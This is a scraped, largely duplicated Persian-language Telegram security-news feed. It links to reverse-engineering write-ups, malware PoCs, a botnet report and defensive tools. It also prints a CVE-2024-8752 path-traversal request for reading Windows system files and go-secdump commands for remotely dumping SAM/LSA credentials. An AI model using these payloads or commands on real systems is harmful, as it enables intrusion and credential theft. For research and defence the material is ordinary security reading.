Reversing VMCrack
مستندسازی فرآیند مهندسی معکوس و غیر مجازی کردن یک باینری محافظت شده با مبهم سازی مجازی سازی و تکنیک های مختلف anti-debugging
https://blog.deobfuscate.io/reversing-vmcrack
@PfkSecurity
مستندسازی فرآیند مهندسی معکوس و غیر مجازی کردن یک باینری محافظت شده با مبهم سازی مجازی سازی و تکنیک های مختلف anti-debugging
https://blog.deobfuscate.io/reversing-vmcrack
@PfkSecurity
Reverse Engineering Blog
Reversing VMCrack
Reverse engineering a binary obfuscated with virtual machine obfuscation. The challenge is vmcrack from Hack The Box.
https://github.com/0x6rss/WhatsApp-extension-manipulation-PoC/tree/main
بدافزار اندروید (apk.) را می توان از طریق یک سند پی دی اف جعلی با دستکاری پسوند فایل در برنامه WhatsApp منتشر کرد. PoC در این مخزن موجود است
@PfkSecurity
بدافزار اندروید (apk.) را می توان از طریق یک سند پی دی اف جعلی با دستکاری پسوند فایل در برنامه WhatsApp منتشر کرد. PoC در این مخزن موجود است
@PfkSecurity
GitHub
GitHub - 0x6rss/WhatsApp-extension-manipulation-PoC: Android malware (.apk) can be spread through a fake PDF document by manipulating…
Android malware (.apk) can be spread through a fake PDF document by manipulating the file extension in the WhatsApp application. PoC is available in this repo - 0x6rss/WhatsApp-extension-manipulati...
CVE-2024-8752
GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
#exploit #poc
@PfkSecurity
GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
#exploit #poc
@PfkSecurity
💡واژه نامه کلاهبردار تلگرام
یادم نیست چطور با این مورد برخورد کردم اما چند وقت پیش آن را ذخیره کردم. 278 اصطلاح مختلف مربوط به کلاهبرداری. اعتبار در پایین برگه آنها است.
https://docs.google.com/spreadsheets/d/1-ICFqnnm0DryaVfCdp7NwleGG03pJorT63bEMPBmji8/htmlview#
@PfkSecurity
یادم نیست چطور با این مورد برخورد کردم اما چند وقت پیش آن را ذخیره کردم. 278 اصطلاح مختلف مربوط به کلاهبرداری. اعتبار در پایین برگه آنها است.
https://docs.google.com/spreadsheets/d/1-ICFqnnm0DryaVfCdp7NwleGG03pJorT63bEMPBmji8/htmlview#
@PfkSecurity
Google Docs
The Fraudster Glossary
💡How A Drive By Download Works
در مرحله اول: مهاجم از یک وب سایت موجود و قانونی سوء استفاده یا اکسپلویت می کند.
در مرحله دوم : کاربر به وب سایت در معرض خطر مرور می کند.
در مرحله سوم : اکسپلویت جاوا مخفی، پیلود مخرب را دانلود می کند و آن را بی صدا اجرا می کند.
در مرحله چهارم : تروجان دسترسی از راه دور نصب شده است، reverse shell را به مهاجم باز می کند .
در مرحله پنجم : مهاجم کنترل از راه دور را بر روی کامپیوتر کاربر به دست می آورد .
در مرحله ششم :مهاجم از گذرواژههای جمعآوریشده برای انتقال دادههای جانبی و مرحلهای در وبسایت شرکت در دسترس خارجی استفاده میکند .
در مرحله هفتم :مهاجم داده های مرحله بندی شده را از وب سایت شرکت قربانی بازیابی می کند.
@PfkSecurity
در مرحله اول: مهاجم از یک وب سایت موجود و قانونی سوء استفاده یا اکسپلویت می کند.
در مرحله دوم : کاربر به وب سایت در معرض خطر مرور می کند.
در مرحله سوم : اکسپلویت جاوا مخفی، پیلود مخرب را دانلود می کند و آن را بی صدا اجرا می کند.
در مرحله چهارم : تروجان دسترسی از راه دور نصب شده است، reverse shell را به مهاجم باز می کند .
در مرحله پنجم : مهاجم کنترل از راه دور را بر روی کامپیوتر کاربر به دست می آورد .
در مرحله ششم :مهاجم از گذرواژههای جمعآوریشده برای انتقال دادههای جانبی و مرحلهای در وبسایت شرکت در دسترس خارجی استفاده میکند .
در مرحله هفتم :مهاجم داده های مرحله بندی شده را از وب سایت شرکت قربانی بازیابی می کند.
@PfkSecurity
خبر جان باختن ۵۱ کارگر معدن طبس قلب همه را به درد آورد.
به خانوادههای عزیزانی که عزیزانشان را در این حادثه از دست دادند، تسلیت میگوییم. امیدواریم روزی شاهد باشیم که چنین اتفاقات تلخی تکرار نشود.
به خانوادههای عزیزانی که عزیزانشان را در این حادثه از دست دادند، تسلیت میگوییم. امیدواریم روزی شاهد باشیم که چنین اتفاقات تلخی تکرار نشود.
دستگاههای SOHO و IoT، از جمله مودمها، روترها، دوربینهای IP، دستگاههای NVR/DVR و دستگاههای NAS آلوده به باتنت Raptor Train
250k+ دستگاه از فروشندگان بسیاری (Mikrotik، Zyxel، Hikvision و غیره)
https://blog.lumen.com/derailing-the-raptor-train/
@PfkSecurity
250k+ دستگاه از فروشندگان بسیاری (Mikrotik، Zyxel، Hikvision و غیره)
https://blog.lumen.com/derailing-the-raptor-train/
@PfkSecurity
Lumen Blog
Derailing the Raptor Train
BLL discovered an advanced, active botnet targeting US and Taiwanese strategic verticals, we attribute this to Flax Typhoon based on TTPs and some of their router control network
Uyazvimosti در چارچوب های متن باز C2:
https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/
@PfkSecurity
https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/
@PfkSecurity
Media is too big
VIEW IN TELEGRAM
Windows Malware using Github as C2 (Command and Control)
GithubC2
اثبات ساده کد مفهومی در سی شارپ برای ایجاد یک برنامه ساده ویندوزی که از مخزن Github و APIها به عنوان یک Command and Control channel (C2) استفاده می کند.
https://github.com/gemini-security/GithubC2
@PfkSecurity
GithubC2
اثبات ساده کد مفهومی در سی شارپ برای ایجاد یک برنامه ساده ویندوزی که از مخزن Github و APIها به عنوان یک Command and Control channel (C2) استفاده می کند.
https://github.com/gemini-security/GithubC2
@PfkSecurity
Devil Hosting – Analysis CLR Hosting Used by Malwares
https://aleeamini.com/devil-hosting-clr-hosting-in-malwares/
#Malware
@PfkSecurity
https://aleeamini.com/devil-hosting-clr-hosting-in-malwares/
#Malware
@PfkSecurity
Binary Graveyard 🪦
Devil Hosting - Analysis CLR Hosting Used by Malwares - Binary Graveyard 🪦 Devil Hosting
This type of malwares use the CLR Hosting, which I named it Devil Hosting, to run malicious codes in memory without any footprint.
آزمایشگاه دور زدن AV/EDR کوچک برای اهداف آموزشی و یادگیری
https://github.com/Xacone/BestEdrOfTheMarket#
تکنیک های دفاعی ⚔️
چند سطح API Hooking
SSN Hooking/Crushing
IAT Hooking
Shellcode Injection Detection
@pfksecurity
https://github.com/Xacone/BestEdrOfTheMarket#
تکنیک های دفاعی ⚔️
چند سطح API Hooking
SSN Hooking/Crushing
IAT Hooking
Shellcode Injection Detection
@pfksecurity
GitHub
GitHub - Xacone/BestEdrOfTheMarket: EDR Lab for Experimentation Purposes
EDR Lab for Experimentation Purposes. Contribute to Xacone/BestEdrOfTheMarket development by creating an account on GitHub.
NetGuard
راه های ساده و پیشرفته ای را برای مسدود کردن دسترسی به اینترنت ارائه می دهد - بدون نیاز به روت. برنامهها و آدرسها میتوانند بهصورت جداگانه اجازه داشته باشند یا از دسترسی به Wi-Fi و/یا اتصال تلفن همراه شما محروم شوند.
https://github.com/M66B/NetGuard
وب
https://netguard.me/
@pfksecurity
راه های ساده و پیشرفته ای را برای مسدود کردن دسترسی به اینترنت ارائه می دهد - بدون نیاز به روت. برنامهها و آدرسها میتوانند بهصورت جداگانه اجازه داشته باشند یا از دسترسی به Wi-Fi و/یا اتصال تلفن همراه شما محروم شوند.
https://github.com/M66B/NetGuard
وب
https://netguard.me/
@pfksecurity
GitHub
GitHub - M66B/NetGuard: A simple way to block access to the internet per app
A simple way to block access to the internet per app - M66B/NetGuard
تشخیص Honeypots
الگوهای هسته برای تشخیص honeypot.
این مخزن شامل قالبهای Nuclei برای شناسایی چندین هانیپات منبع باز معروف است، مانند: ADBHoney، Conpot، Cowrie، Dionaea (multiple services)، ElasticPot، Mailoney، Redis Honeypot، Snare و غیره.
https://github.com/UnaPibaGeek/honeypots-detection
#honeypot
@PfkSecurity
الگوهای هسته برای تشخیص honeypot.
این مخزن شامل قالبهای Nuclei برای شناسایی چندین هانیپات منبع باز معروف است، مانند: ADBHoney، Conpot، Cowrie، Dionaea (multiple services)، ElasticPot، Mailoney، Redis Honeypot، Snare و غیره.
https://github.com/UnaPibaGeek/honeypots-detection
#honeypot
@PfkSecurity
GitHub
GitHub - UnaPibaGeek/honeypots-detection: Nuclei templates for honeypots detection.
Nuclei templates for honeypots detection. Contribute to UnaPibaGeek/honeypots-detection development by creating an account on GitHub.
Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
evilsocket
Attacking UNIX Systems via CUPS, Part I
🔄🖼️ go-secdump v0.3.0
ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک
پشتیبانی برای احراز هویت Kerberos اضافه شده است
مثال:
Relay:
گزینه های اصلی:
▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases
@PfkSecurity
ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک
پشتیبانی برای احراز هویت Kerberos اضافه شده است
username + password
username + NT Hash
username + AES Key
cached credentials on Linux (TGS or TGT in .ccache file)
مثال:
./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2Relay:
./go-secdump --host 192.168.0.100 -n --relayگزینه های اصلی:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases
@PfkSecurity